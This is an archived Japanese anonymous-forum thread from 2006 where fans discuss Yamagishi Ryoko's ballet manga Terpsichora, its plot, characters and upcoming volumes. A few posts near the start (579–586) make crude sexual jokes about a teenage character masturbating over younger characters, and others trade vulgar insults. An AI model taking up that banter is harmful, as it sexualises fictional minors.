ナルホドねーと思うけど
(ついでに合唱部副部長が六花を・・・というのも
ナルホドねーと思えるけど)
大地の場合はありえないほど清い恋だったのかもしれんと思う
千花もありえないほど清いキャラだったし

579 :名無しんぼ@お腹いっぱい:2006/10/01(日) 10:48:20 ID:Mr1OWt0XO
中一より上の男子は99%は自家発電してるらしいから
高校生の大地に純粋な期待はしないほうがいいかと

580 :名無しんぼ@お腹いっぱい:2006/10/01(日) 15:39:14 ID:NGRQ49csO
バレエダンサーとか産婦人科の男性はコーフンのツボが違うのでわ。いちいち勃興してたらたいへんです。

581 :名無しんぼ@お腹いっぱい:2006/10/01(日) 16:55:30 ID:iB7Ab/3o0
大地タイプは、千花たんは清いから妄想できない!
と言いつつ、つい千花でオナってしまって激しく後悔するタイプ。

582 :名無しんぼ@お腹いっぱい:2006/10/01(日) 18:00:49 ID:NGRQ49csO
ついフトミを使ったりすて。

583 :名無しんぼ@お腹いっぱい:2006/10/01(日) 19:21:01 ID:Mr1OWt0XO
まだ茜のほうがわかる

584 :名無しんぼ@お腹いっぱい:2006/10/01(日) 19:55:47 ID:lBRgamA00
フィニッシュにふとみがでてきてああああああとかw
東京大学物語にそんな話あったなー。

高校生にはよくあること。

585 :名無しんぼ@お腹いっぱい:2006/10/02(月) 15:12:32 ID:omswAJBpO
今月号のMOREでアラベスクとテレプシが紹介されてた
カラーじゃない二色の読者ページにある、コラムみたいなやつ。
目が離せない展開とか書いてあった。

586 :名無しんぼ@お腹いっぱい:2006/10/02(月) 18:14:27 ID:l2/66TxR0
>>583 あんな淵さんみたいなのじゃ抜けません

587 :名無しんぼ@お腹いっぱい:2006/10/03(火) 19:53:26 ID:aHrpZoOo0
>>569
前年の「くるみ…」にゲスト出演してた
ロイヤルバレエの平沢徹也が熊川のモデルだと思う

駿は堀内元がモデルだと思ってた
(顔は韓流スター?チャングム?)

588 :名無しんぼ@お腹いっぱい:2006/10/03(火) 21:40:26 ID:LOb/QESr0
平沢は名前だけモデルで、後からやっぱり熊川使いたくなって
駿君出したんだと思う。

589 :名無しんぼ@お腹いっぱい:2006/10/03(火) 22:58:52 ID:ngWYpAmb0
>「商売うまいな貝塚」 (正確には「運営うまいな貝塚」)
でも駿のギャラは草間が出してんじゃないの?
どんな人気ダンサーが出ようと、チケットは出演者に割り当てるからすべて捌けるのでは?

590 :名無しんぼ@お腹いっぱい:2006/10/04(水) 01:13:55 ID:gYIjxMkf0
WOWOWで金曜にベジャール作品を放映するそうですよ。

591 :名無しんぼ@お腹いっぱい:2006/10/04(水) 09:16:55 ID:E0vjWldgO
アクロバット白鳥の湖モナー

592 :名無しんぼ@お腹いっぱい:2006/10/04(水) 21:58:37 ID:E0vjWldgO
イシスって面白いですか?古本屋で買ってみた。

593 :名無しんぼ@お腹いっぱい:2006/10/04(水) 23:14:20 ID:zkYfsRZo0
>592
グロエグイ場面ちょっとあるが、まあ面白い。イシス好き。
つうか、まだ読んでないの?

594 :名無しんぼ@お腹いっぱい:2006/10/05(木) 00:06:15 ID:MFNgtiiD0
買ったなら読めよ。自分で判断しろ。アホか

595 :名無しんぼ@お腹いっぱい:2006/10/05(木) 00:30:13 ID:Ji55xpZY0
イシス、ハトシェプストの古代エジプトシリーズはかなり好きだ。
テレプシの合間にああいう外国の古いお話を書いてくれないものだろうか。

596 :名無しんぼ@お腹いっぱい:2006/10/05(木) 01:03:32 ID:XWtmYzy00
だね。
山岸さんの作品では時代物、古代物が好きだな。
テレプシ2部始まるまでの間に、バレエやテレプシとは全く関係ないもの描いて欲しいな。

597 :名無しんぼ@お腹いっぱい:2006/10/05(木) 10:21:21 ID:rmMWuJtv0
>593
エログロビューチフルって言ってよ
上に乗っかって放心状態でケツ振るネフティス 
カワイス!

六花ちゃんの踊り早く見たいなー
白鳥の湖で空美、千花が踊っていたとき
勝手に振り付けの六花ちゃんの伏線が遂に開花したんだね

598 :名無しんぼ@お腹いっぱい:2006/10/05(木) 18:44:27 ID:3UDRGnKX0
イシスが感謝の言葉でポッてなるのがカワイイw
ネフティスのユサユサはリアルで怖いw

599 :名無しんぼ@お腹いっぱい:2006/10/05(木) 19:57:56 ID:ZgsG2P9g0
テレプシのネタばれ〜
まだかしらん・・・

600 :名無しんぼ@お腹いっぱい:2006/10/05(木) 20:29:48 ID:0dKh1xnH0
>>599
少女漫画板の山岸スレに来てるよ。

601 :名無しんぼ@お腹いっぱい:2006/10/05(木) 21:21:57 ID:ZgsG2P9g0
>>600

ありがとうございまーす

602 :名無しんぼ@お腹いっぱい:2006/10/05(木) 22:21:30 ID:egY3VcEpO
六花の心情が全く描かれてなかったせいか
少し物足りなさをカンジた。
もちろん涙はでたが。(〒_〒)

603 :名無しんぼ@お腹いっぱい:2006/10/05(木) 23:02:34 ID:1kd3gbQD0
このスレはネタバレ禁止なのに。
なんでバレ話するやつがいるんだ。

604 :名無しんぼ@お腹いっぱい:2006/10/05(木) 23:35:44 ID:egY3VcEpO
テンプレによるとあと30分でバレ解禁?

605 :名無しんぼ@お腹いっぱい:2006/10/06(金) 00:44:58 ID:WkELa9cz0
うちの地方だと店頭に並ぶのは月曜だろうな…orz

606 :名無しんぼ@お腹いっぱい:2006/10/06(金) 13:36:19 ID:WQJP48AS0
>>598
あのユサユサはイシスが後ろからネフティスを動かしてるんだと
勝手に思っていた。

607 :名無しんぼ@お腹いっぱい:2006/10/06(金) 14:47:36 ID:U27TTYtv0
あ、あれ?ゴッシー何処?

608 :名無しんぼ@お腹いっぱい:2006/10/06(金) 23:19:49 ID:4QkyDqlx0
「この作品僕も踊りたい!!」

「いや、あれ白鳥、、、女だから」

ワロタwwww

609 :名無しんぼ@お腹いっぱい:2006/10/07(土) 01:59:22 ID:4UnPkI6M0
ユキに振付家に向いた感性があるってのはいいとして、
また今回の勉強会で自分の内にある表現したいものを
彼女にできる範囲で表現し切れたというのもいいと思うんだけど、
駿の「俺もあれ踊りたい」というのはちょっと無理があると思った。

610 :名無しんぼ@お腹いっぱい:2006/10/07(土) 09:22:31 ID:5+15Wy8V0
おもろかった…
来月は休み、短編(2〜3話?)を一回載せて来春から第2部
ってヤル気満々だねギシさん 早く続き読みてぇ

611 :名無しんぼ@お腹いっぱい:2006/10/07(土) 15:28:08 ID:eIbzB4qQ0
>>609
そうかな。駿は天真爛漫な天才として描かれてるから、
男女の別とか、表面的な(振り付けとしても演技としても)巧拙にとらわれず、
六花の振り付けの本当に清新なところや、芯にある才気みたいなものに
誰より感応した、ってことでいいと思った。
ああいう、本人にも止められないような切実な部分から出てきた創作って、
表現として、上手い下手じゃない独特の強さがあるしさ。
とりあえず、キャラクターの中で、千花がらみの思い入れなどを抜きで、
六花の振り付けをパッと見て良さを見抜くには、駿以上の適任はいないと思う。

612 :名無しんぼ@お腹いっぱい:2006/10/07(土) 17:40:42 ID:Mja+ZnR20
駿、男でもトゥ立ちできるの?自重で辛くない?

613 :名無しんぼ@お腹いっぱい:2006/10/07(土) 18:03:30 ID:eIbzB4qQ0
いや、だから、そういう現実的・技術的なことをさておいて、
作品自体に感動して「これかっこいい! 僕も踊る!」と思い、
それを口に出しちゃうのが駿というキャラクターだと思うし、
同時に、彼に率直にそう言わせる程の六花の作品の良さを
表現してるわけでしょう。
実際に踊れるかどうかは、「いや、あれ白鳥」で作品中で既に
一刀両断されてるんだし。

「トロカデロ・デ・モンテカルロの連中に出来ることが
僕に出来ない訳ないじゃん」とかいって、
あっさりトゥシューズ履きそうなキャラでもあるけどね。

614 :名無しんぼ@お腹いっぱい:2006/10/07(土) 18:28:25 ID:Mja+ZnR20
ありがとう。
厨房の発表会に(きちんとした舞台でもないのに)プロが見に来るって設定もすごいね。

トロカデロはできるんだ。サスガ!

615 :名無しんぼ@お腹いっぱい:2006/10/07(土) 20:55:46 ID:yhuHeg4t0
ジャンプや回転が多くて男性の踊りみたいっていってたしね
駿が得意な感じなんでは
トウシューズはかなくてもおどれるんじゃ
バレエのことはよく知らんけど

そういえばカラボスのときもジャンプが多くて男性の踊りみたいっていってなかったけ?
ユキの特徴なんかもね 男性も女性もどっちも踊れるような振り付け
モダンっぽい?のかしら

616 :名無しんぼ@お腹いっぱい:2006/10/07(土) 21:08:27 ID:/ble4OoG0
今、世界ふしぎ発見でハワードカーターの顔写真が出てた。
作中のカーナボン卿に似ていた。

617 :名無しんぼ@お腹いっぱい:2006/10/07(土) 21:48:24 ID:GO64D0000
>>611
あ〜、なるほど。そう思えばいいね確かに。

618 :名無しんぼ@お腹いっぱい:2006/10/07(土) 22:12:29 ID:jzb/BBHf0
>>608
じわじわ来た

619 :名無しんぼ@お腹いっぱい:2006/10/08(日) 00:33:27 ID:u6LLzylx0
ゆっくりしたテンポの曲で倍速振り付けって
プルシェンコのトスカのキモステップを思い出した。
ああいう感じなら男性ダンサーでもやってみたくなるかもしれない。


620 :名無しんぼ@お腹いっぱい:2006/10/08(日) 01:52:45 ID:rjMO3H44O
キモステップってキモいステップのことですか?
そんなステップあるのかツ

ユキのギエムが踊ったらカコイイだろなあ。
倍速+ググーッてねばっこくバランス…

621 :名無しんぼ@お腹いっぱい:2006/10/08(日) 02:39:18 ID:u6LLzylx0
ttp://www.youtube.com/watch?v=sB3ZofqIGq0&mode=related&search=
1:55あたりからのサーキュラーステップね。

622 :名無しんぼ@お腹いっぱい:2006/10/08(日) 11:29:09 ID:yfIWvpYx0
これかー。実況のとき「狂ったオカマみたい」と言われてて笑ったな〜w
ステップだけ浮いてて変だよね。

623 :名無しんぼ@お腹いっぱい:2006/10/08(日) 16:24:36 ID:NvTRF1vN0
扉絵がカラーだったね。
あれが10巻の表紙になるのかな。
1月号あたりで10巻発売のお知らせが来そうな気がする。

624 :名無しんぼ@お腹いっぱい:2006/10/08(日) 19:27:13 ID:rKPUThWI0
くるみの時みたいにグダグダでなくていいから
ユキが振り付け完成させるまでの内面やらレッスンの苦労やらを
もうちょっと見たかったな
母の反応ももう少しちゃんと見たかったし

625 :名無しんぼ@お腹いっぱい:2006/10/09(月) 01:16:51 ID:3wUMJaJB0
>>616
詳細きぼんぬ
カーターって格好よくないの?

626 :名無しんぼ@お腹いっぱい:2006/10/09(月) 02:22:37 ID:U0PYgaX00
ttp://images.google.com/images?q=&lr=lang_ja&ie=sjis&oe=sjis&q=Howard%20Carter&ie=sjis&oe=sjis
渋いと言えなくもないけど…

カーナボン卿のほうがロマンスグレーな感じだね。
3枚目の右側の人。

627 :名無しんぼ@お腹いっぱい:2006/10/09(月) 03:14:42 ID:UEj+8NZr0
>>623
単行本楽しみだな。いや、悲しい話だから複雑だけど…でもやっぱり読みたい。

628 :名無しんぼ@お腹いっぱい:2006/10/09(月) 22:01:31 ID:L+sSrRsjO
加筆しなくていいからサクサク出して欲しいね

629 :名無しんぼ@お腹いっぱい:2006/10/09(月) 22:52:36 ID:KY5ia+320
>>626
ありがとう。
全然漫画と顔違うね。。。特にカーナボン卿・・・
カーターはかっこいいけどけっこうおじさんだね。

630 :名無しんぼ@お腹いっぱい:2006/10/09(月) 23:33:33 ID:WW0C+ZUP0
このくらいギラギラしてないと発掘なんてやってらんないんだろうなあ。

631 :名無しんぼ@お腹いっぱい:2006/10/10(火) 16:54:28 ID:0v7lgMpO0
カーナボン卿 痩せてる・・

632 :名無しんぼ@お腹いっぱい:2006/10/10(火) 17:58:56 ID:0v7lgMpO0
>>624
今回は読者にも他人にも秘密にして最後に明らかにさせるという手法をとったんでしょう。
毎回同じ描き方じゃ、作品違っても飽きる。

633 :名無しんぼ@お腹いっぱい:2006/10/10(火) 20:05:32 ID:hsxu7S6K0
やっぱり草間は「ひよっこが受けを狙うならどうぞ」って
思ってるんだろうか…

634 :名無しんぼ@お腹いっぱい:2006/10/10(火) 21:05:54 ID:R/X+EnUzO
そのセリフめちゃめちゃはまるなぁw
あれも伏線だったか

635 :名無しんぼ@お腹いっぱい:2006/10/11(水) 00:32:10 ID:M4T95ozE0
ウケたかなあ?
一般の観客は戸惑ってたみたいだけど。
まっさきに駿がブラボーを出したからつられて盛り上がっただけで。

636 :名無しんぼ@お腹いっぱい:2006/10/11(水) 09:28:12 ID:RCqiJELN0
ネームバリューも何もない創作物は、
最初はやっぱりそんなもんじゃないの

637 :名無しんぼ@お腹いっぱい:2006/10/11(水) 12:17:21 ID:6nODdmHS0
結局、毛箱への因果応報はなかったか…。
第二部に期待、はできないだろうな。
何となく悔しい…。

638 :名無しんぼ@お腹いっぱい:2006/10/11(水) 12:36:17 ID:hx2lFFsW0
でも、二部にまでケバコ出て来たたら、それはそれでウザスだし。

639 :名無しんぼ@お腹いっぱい:2006/10/11(水) 20:20:52 ID:jz4IK2Jq0
駿くんの顔が崩れていく・・・

640 :名無しんぼ@お腹いっぱい:2006/10/11(水) 20:49:33 ID:bANBbUoF0
2部では誰が死ぬのかねえ

641 :名無しんぼ@お腹いっぱい:2006/10/11(水) 21:25:07 ID:p0sCEQP90
一般客も、ハラハラしつつも引き込まれてたんじゃ
戸惑ったのは演技が終わったのかどうかがよくわからなかったからだと思うけど
まあ、演技というか作品というかへの戸惑いもあったかもしれんが
トガッシーが前に言ってた、ハラハラするけどそれが美しいっていうやつだったのかも

642 :名無しんぼ@お腹いっぱい:2006/10/11(水) 22:04:43 ID:rZul+Mvz0
エリートクラスとはいえ中学生が難易度のやたら高い振り付けに果敢に挑戦してたら
そりゃ拍手だって出るだろう普通。

643 :名無しんぼ@お腹いっぱい:2006/10/11(水) 23:43:44 ID:Fgll6FcM0
六花が振付けたトゥオネラは空美に踊って欲しい。
彼女なら男性張りの高度な振付けもこなせるだろうし。

644 :名無しんぼ@お腹いっぱい:2006/10/12(木) 00:31:45 ID:LD94D4KR0
今月号のダビチン、ギシ先生の対談も載ってるんだね。
これも10巻の巻末に入るんかな。

645 :名無しんぼ@お腹いっぱい:2006/10/12(木) 01:10:32 ID:UbpGX4Ab0
顔の形から歪んでるようなブスのは見たくない

646 :名無しんぼ@お腹いっぱい:2006/10/12(木) 10:41:06 ID:DoDDC1EF0
話ぶった切ってすいません。最近山岸さんにはまったんですが
タイトルが神話の作品で、なんでこの内容でこのタイトルにしたのかわからん!てものが結構あります。
それで古事記でも読めばわかるのかなーと思ったんですが。何かこれがおすすめ、みたいのが
あったら教えてもらえますか?

647 :名無しんぼ@お腹いっぱい:2006/10/12(木) 12:09:25 ID:ZwcvchBG0
>>645
ひでえw

648 :名無しんぼ@お腹いっぱい:2006/10/12(木) 14:12:25 ID:UbpGX4Ab0
コリオグラファーに拘るのがちと不満。
ニジンスキーって名をきいて誰もコリとは思わんだろー。
六花ちゃんも、振り付けもできる天才プリマ、ってのがいいのに・・・。

649 :名無しんぼ@お腹いっぱい:2006/10/12(木) 14:40:39 ID:6ZXBgfW6O
プリマの道は閉ざされたって感じのラストだったね

650 :名無しんぼ@お腹いっぱい:2006/10/12(木) 17:24:23 ID:f/y4xBEF0
コリオグラファー<プリマ なの?
まぁ、一線を退いたダンサーがやってる感じだが。

651 :名無しんぼ@お腹いっぱい:2006/10/12(木) 17:27:08 ID:f/y4xBEF0
有名な作品になれば自分が死んだ後にも残るし、ある意味おいしい。
ダンサーは、映像が残っても、実地で見られないと。

652 :名無しんぼ@お腹いっぱい:2006/10/12(木) 18:20:58 ID:F8DjtYzZ0
現場では 監督>俳優 みたいに
創造主(コリオグラファー)>表現者(ダンサー)だと思うがね。
一般の価値では、公演の宣伝時にどっちの名前をどーんと出して客が入るかかな。

653 :名無しんぼ@お腹いっぱい:2006/10/12(木) 18:23:27 ID:aCAKaiLU0
>>646
あなたの好みが分からないので何ともいえない。
漫画喫茶で片っ端から読めば良いと思う。

654 :名無しんぼ@お腹いっぱい:2006/10/12(木) 18:23:35 ID:UbpGX4Ab0
監督主人公の漫画なんて無えよ。
プリマ>振付師
俳優>監督

655 :名無しんぼ@お腹いっぱい:2006/10/12(木) 19:58:12 ID:mx90drLC0
監督主人公漫画ったら「明日の王様」がある
(演劇の脚本演出だが)

途中まで面白かった
ガラかめの「紅天女」に相当する
最終演目「逆歳の峠」をどう見せるか期待してたが…

656 :名無しんぼ@お腹いっぱい:2006/10/12(木) 20:44:05 ID:UbpGX4Ab0
まあ無いよ。0とは言わんが。

657 :名無しんぼ@お腹いっぱい:2006/10/12(木) 22:21:46 ID:mx90drLC0
「 ROOKIES」
「やったろうじゃん」
「クロカン」
「ダントツ」
「ラストイニング」
「甲子園に笑え」
野球監督が主人公

あとモヨ子の「監督不行届」があったなw
あと「沖縄アクターズスクール物語」校長が主役w

658 :名無しんぼ@お腹いっぱい:2006/10/13(金) 00:22:53 ID:WBcgxFwu0
やっぱ選手が主人公より
はるかに少ないね・・・・

659 :名無しんぼ@お腹いっぱい:2006/10/13(金) 01:11:02 ID:0l1I0pliO
漫画だからね。
監督もの描いたら作中作やらなきゃいけないから漫画的にはリスキー。
それなら役者やダンサーが熾烈な争いをする漫画の方が面白いよね。

でもその事が現実でダンサーの方がコリオグラファーより偉いと言う事には繋がらない。

660 :名無しんぼ@お腹いっぱい:2006/10/13(金) 01:44:50 ID:FyQfrH2x0
まあでも、それなりの実績を作った「作り手」は、タイトルと並行して
名前が挙げられるようにはなるわな。

映画なら「キューブリックの『アイズ・ワイド・シャット』の主演・トム・クルーズ」とか
「キャメロンの『タイタニック』の主演ディカプリオ」みたいな感じで。
「バランシンの○○」、「ベジャールの××」とかフツーに言われてるし。

もちろんあくまでメインは、その「△△の□□」を上演する主役の人間だけど。

661 :名無しんぼ@お腹いっぱい:2006/10/13(金) 10:11:20 ID:V610uFOnO
「甲子園の空に笑え!」な。
その後の監督は「メイプル戦記」に描かれる。

662 :名無しんぼ@お腹いっぱい:2006/10/13(金) 12:05:39 ID:BXFo+tga0
昔少女漫画の演劇もので、主人公が最初舞台女優目指してたけど、
演技よりも演出や脚本の方に光るものがあって、
結局そっちの道で頑張るってのあったな、題名忘れたけれど。

663 :名無しんぼ@お腹いっぱい:2006/10/13(金) 12:06:04 ID:WBcgxFwu0
>でもその事が現実でダンサーの方がコリオグラファーより偉いと言う事には繋がらない。

だれか繋げようとしたの?

664 :名無しんぼ@お腹いっぱい:2006/10/13(金) 14:41:44 ID:wFFrVnTX0
>>662
それが「明日の王様」だと思うんだが

665 :名無しんぼ@お腹いっぱい:2006/10/13(金) 20:50:09 ID:wl5BkqGM0
同作者の「黒鳥」なんかだと、明らかにコリオグラファー>ダンサーだったと思う。

666 :名無しんぼ@お腹いっぱい:2006/10/14(土) 09:40:41 ID:1BeaDcjYO
あれ?そうお?
マリアは黒鳥踊っただけじゃん
あの振り付け男なら、舞台の脚本家や演出家なんかと一緒でバレエ団サイドの人だからいばっていただけだし。

667 :名無しんぼ@お腹いっぱい:2006/10/14(土) 12:03:45 ID:YBsaysnf0
あれは賞もらった記念の公演だったから演目を本人が自由に選べたんでないの?


668 :名無しんぼ@お腹いっぱい:2006/10/14(土) 12:53:50 ID:IvZRv48E0
黒鳥のコリオグラファーは絶対権力者みたいな描かれ方だったね。

669 :名無しんぼ@お腹いっぱい:2006/10/14(土) 13:50:28 ID:LRFZ9Fwh0
>>665
ロリコンで自分勝手なキモイキモイおっさんだったよね

670 :名無しんぼ@お腹いっぱい:2006/10/14(土) 14:13:21 ID:uR8mvEKD0
アラベスクじゃ振り付け勝手に変えられて怒ってたな。


671 :名無しんぼ@お腹いっぱい:2006/10/14(土) 15:45:15 ID:FtaubNZ20
646は出典の方を知りたいんじゃない?
出典があるものは多過ぎて、研究書でも出てればともかく、じやこれとか便利にあげられないよ。
興味がわいたのならググるなりして図書館で古事記でも海外の神話でも読んでみればいい。
そういう発展を作者も望んでると思うよ。

672 :名無しんぼ@お腹いっぱい:2006/10/14(土) 18:07:16 ID:tqMkEb3h0
「あなたのアラベスクじゃなく、私のアリババが殺されたんだ」って先生も切れてた。

673 :名無しんぼ@お腹いっぱい:2006/10/15(日) 13:16:09 ID:QEW45FKf0
>>669
ロリじゃないでしょ。27歳ぐらいだっけ奥さんと別れるの。
芸術家って言うけど小さいヤツだなと思ってた。
バランシンって名声があるからなおさら権力者だったのでは?



674 :名無しんぼ@お腹いっぱい:2006/10/15(日) 19:43:17 ID:Y5vBPOexO
あれバランシンだったのか!!!

675 :名無しんぼ@お腹いっぱい:2006/10/15(日) 22:18:54 ID:lRaYvBW30
>>673
ターニャに、実は少女時代から目をつけていたかもしれないことに対して
言ってるんじゃないかな<ロリ

676 :名無しんぼ@お腹いっぱい:2006/10/15(日) 23:21:56 ID:M/4QqdIx0
ダンサーとして才能に目をつけていた
という事が何故ロリに結びつくのだろう?
黒鳥ってそういう話なのかな?

677 :名無しんぼ@お腹いっぱい:2006/10/16(月) 00:07:15 ID:nyNPhGHj0
次々と若い子に乗り換えていってるから、ロリな印象は自分も受けた。

678 :名無しんぼ@お腹いっぱい:2006/10/16(月) 00:24:37 ID:r2eXcBHy0
あんな離婚と再婚を繰り返す人となんで女性たちはあっさり結婚了承するのか
わからんかったが、
やはりダンサーからみたら実力名声権力、ぜんぶそろった憧れの人との結婚ってことなんだろうね・・

679 :名無しんぼ@お腹いっぱい:2006/10/16(月) 01:37:42 ID:WHgFBWPM0
本当のロリなら、20代になったところで捨てるんでは。
若い女好きは間違いないが。
>>678
恋愛には実は上下関係があるって言うけど、
バランシンがより上位なんだろうね・・・・・



680 :名無しんぼ@お腹いっぱい:2006/10/16(月) 01:42:07 ID:Dtc+hytF0
「女房と畳は新しい方が良い」という話だと思ったが
(何故かギシ漫画にはこういう概念を抱く男が多い)
最近はそういうのをロリって言っちゃうんだな。

681 :名無しんぼ@お腹いっぱい:2006/10/16(月) 02:00:21 ID:WHgFBWPM0
>>680
自分はギシ漫画ってグラマー美女が印象に残ってて
成熟した女上位の漫画って思ってた。

682 :名無しんぼ@お腹いっぱい:2006/10/16(月) 02:17:20 ID:hBsfaKQB0
>>671
そうですね。とりあえず何かしら借りて読んでみようと思います。ありがとうございます。
漫画読んでおしまい、じゃなくてその後発展していけるのがいいですね。


683 :名無しんぼ@お腹いっぱい:2006/10/16(月) 13:22:18 ID:PGDqM3SCO
>>680
萩尾漫画にそういうのあったなぁ
ビール持ってくれるなれなれしい若い男に恋をする人妻

684 :名無しんぼ@お腹いっぱい:2006/10/17(火) 00:30:50 ID:LeaiEqGW0
>>681
でもグラマー美女は大抵不幸だから
熟女上位というわけでもなさそうな感じ。
美少女もメンヘラだったりすることが多いけど。

685 :名無しんぼ@お腹いっぱい:2006/10/17(火) 08:15:34 ID:FGx8ZRuV0
>>684
存在感すごくないか?美少女のほうが印象薄いので
あんまり感じないなあ

686 :名無しんぼ@お腹いっぱい:2006/10/17(火) 23:47:30 ID:UPbAA6Va0
次の単行本は2部が途中から始まるのかな?

687 :花と名無しさん:2006/10/18(水) 03:55:20 ID:bxn+ybyR0
>>686
1部と短編で埋めて、次の次の巻からきっちり2部、がいいね。

688 :名無しんぼ@お腹いっぱい:2006/10/18(水) 07:43:30 ID:19qsTmzl0
一部だけで埋まるんでない?
六花クララもまだ途中だし、結構話たまってるでしょ。

689 :名無しんぼ@お腹いっぱい:2006/10/18(水) 09:24:39 ID:gh8S17xz0
今までの厚さのままだとすると、第1部の最終話だけが、
第10巻に収まらないらしい。

690 :名無しんぼ@お腹いっぱい:2006/10/18(水) 09:58:44 ID:iMZjkNF+0
>>689
なら入れなくてもいい気もするw

691 :名無しんぼ@お腹いっぱい:2006/10/18(水) 14:15:18 ID:Rk0DJz/Q0
無理矢理収めてちょい厚めの10巻にして欲しい。
第二部一話から11巻。
短編は別冊で。

692 :名無しんぼ@お腹いっぱい:2006/10/18(水) 18:21:36 ID:vrYSJZh40
短編3話で1冊って厳しいな
変なものと抱き合わせにならなきゃいいけど。

693 :名無しんぼ@お腹いっぱい:2006/10/18(水) 21:06:31 ID:jixz+Z8u0
さすがに本編一話だけ別の巻てのは無いでしょう
短編がテレプシの話ならアリかもだけど

694 :名無しんぼ@お腹いっぱい:2006/10/18(水) 22:05:26 ID:yIvFwYuF0
>691
私もそれがいいな。
短編は入手困難なコミックスからの再録とあわせるとか。
他の文庫版とかのダブリ作品不可で。

695 :名無しんぼ@お腹いっぱい:2006/10/19(木) 00:34:25 ID:9sdODGeZ0
短編とあわせると、また「雨の訪問者」が入る気がしてならない。
根拠は全くないんだけど。

696 :名無しんぼ@お腹いっぱい:2006/10/19(木) 09:45:01 ID:8Z6qcoVSO
テレプシと合わせるなら、黒鳥と牧神の午後が良いな。
バレエの気分、変えたくないから。

697 :名無しんぼ@お腹いっぱい:2006/10/19(木) 10:46:13 ID:pBS55n4H0
ダブりは勘弁してほすぃ…

698 :名無しんぼ@お腹いっぱい:2006/10/19(木) 14:53:49 ID:E8GKZe2t0
短編はオリジナルだから、いつもよりちょっとページ数が多いんじゃないかと
期待している。


その間ヌイグルマーが休載してればいいよ。

699 :名無しんぼ@お腹いっぱい:2006/10/19(木) 20:03:32 ID:jkbKYcB6O
あ〜いいね それ
オーケン嫌いじゃないけど、ヌイグルマーは完璧スルーだもん
でも、オーケンはテレプシにハマってそうだけどw

700 :名無しんぼ@お腹いっぱい:2006/10/19(木) 23:38:18 ID:iOyy4iKW0
>>697 ンなこと言ってたら山岸読者にはなれません

701 :名無しんぼ@お腹いっぱい:2006/10/19(木) 23:50:45 ID:cnVKiU/z0
来月は休みだっけ?

702 :名無しんぼ@お腹いっぱい:2006/10/20(金) 12:01:06 ID:P7+hfAxTO
休み。
短編は一月号(12月6日発売)からだよ

703 :名無しんぼ@お腹いっぱい:2006/10/21(土) 15:22:40 ID:ozw7+fxi0
>700
いつも買ってる固定ファンに対して配慮がないとは思う。
新規の読者ばっかり買ってるんじゃないんだからね。

704 :名無しんぼ@お腹いっぱい:2006/10/21(土) 17:45:45 ID:4SHJcG4DO
あすかコミクスのは、文庫であんまり出てないのが残念

705 :名無しんぼ@お腹いっぱい:2006/10/21(土) 19:14:29 ID:M4YfUOh/0
>704
角川は漫画文庫自体はないんだよね。
他社で文庫化してる作家さんいるし。
ホラーとかスニーカー文庫で少し出してるけど。

706 :名無しんぼ@お腹いっぱい:2006/10/24(火) 00:11:29 ID:9STMWK060
今思ったけど六花とかママとか金子先生とか魅力的なキャラって
絶対黙々と山岸漫画読みふけったりしなさそうな人ばっかだね
ギシ先生はこの手の漫画に夢中になって掲示板でくだらない
やり取りするような人って大嫌いなんだろうね

707 :名無しんぼ@お腹いっぱい:2006/10/24(火) 00:45:53 ID:UXjJNTNc0
なんだこりゃ?
別スレでくだらないやりとりでもして悔しい目にでもあったのか?

708 :名無しんぼ@お腹いっぱい:2006/10/24(火) 12:07:02 ID:vwsDz1at0
六花とかママとか金子先生とかが、魅力的なキャラだと思える人は、
そもそも山岸マンガに向かないんじゃないか?

709 :名無しんぼ@お腹いっぱい:2006/10/24(火) 12:08:00 ID:vwsDz1at0
チト訂正
六花とかママとか金子先生とかの方が、魅力的なキャラだと思える人は、
そもそも山岸マンガに向かないんじゃないか?

710 :名無しんぼ@お腹いっぱい:2006/10/24(火) 17:45:22 ID:Bn0HsGkSO
あなた山岸漫画に向いてるわ!!
て言われても複雑な気持ちになるかも

711 :名無しんぼ@お腹いっぱい:2006/10/24(火) 18:02:59 ID:UXjJNTNc0
>>709
ああ、ババくせえ・・・・

712 :名無しんぼ@お腹いっぱい:2006/10/24(火) 20:59:03 ID:9STMWK060
チト って言葉久しぶりに聞いた。昭和の香り(w

713 :名無しんぼ@お腹いっぱい:2006/10/24(火) 21:23:42 ID:MySMNJhX0
というかギシ漫画っぽい香りだ。

714 :名無しんぼ@お腹いっぱい:2006/10/24(火) 22:48:29 ID:tqljr/ak0
ねえクワス取ってぇ

715 :名無しんぼ@お腹いっぱい:2006/10/25(水) 00:18:03 ID:DaV8puT2O
>>714
無いよ

714だけに

716 :名無しんぼ@お腹いっぱい:2006/10/25(水) 01:01:13 ID:grMfX1A20

苛めてた女、飛び降りでグチャグチャになった千花の棺桶をニヤニヤしながら何度も覗き込んだんだろうな・・

あ〜胸糞悪い漫画。

読まなきゃ良かった。


717 :名無しんぼ@お腹いっぱい:2006/10/25(水) 01:08:58 ID:4jdOK1WW0
密葬ですが

718 :名無しんぼ@お腹いっぱい:2006/10/25(水) 22:03:59 ID:KarqTAJF0
今頃になって9巻買った。
今月号で1部完できれいにまとまっていたので。
しかし9巻は読んでてつらい。
10巻では今月号まで入れてほしい。
でないと悲しくて読めないよ。

719 :名無しんぼ@お腹いっぱい:2006/10/26(木) 00:22:56 ID:XmGXnpYXO
入るんじゃね?

720 :名無しんぼ@お腹いっぱい:2006/10/26(木) 21:11:13 ID:Ehi2RAP20
来年の手塚治虫文化賞はテレブシで
もうほとんど決まってるんだろうなあ〜。
丁度キリがいいし、賞やるなら今。

721 :名無しんぼ@お腹いっぱい:2006/10/26(木) 21:49:51 ID:mkKzUzSs0
>720
候補作品を推薦してそれが大賞とったら
二名が贈呈式に招待されるらしい。
テレプシを推薦しても大賞はどうかなあ。

722 :名無しんぼ@お腹いっぱい:2006/10/26(木) 23:24:03 ID:2iU8IAFZO
照れ節ってw



手塚賞、今年もエントリーはされたんだよね。
でもほかの作品とか大賞を見たら別にあんな賞名前だけだなと思ってしまった。

723 :名無しんぼ@お腹いっぱい:2006/10/29(日) 16:34:32 ID:YtctjcwN0
ボリショイに17歳で主演デビューしたイワン・ワシリエフってのがいるらしい…

リアルノンナと思った

724 :名無しんぼ@お腹いっぱい:2006/10/29(日) 18:25:30 ID:5zWLUhrd0
このスレが落ちるのも時間の問題だな

725 :名無しんぼ@お腹いっぱい:2006/10/31(火) 00:09:11 ID:C8/m4cvQ0
>>723
イワンなら、男だと思うが・・・。

726 :名無しんぼ@お腹いっぱい:2006/10/31(火) 00:10:52 ID:KYxPoSm50
そういうこっちゃないでしょ。

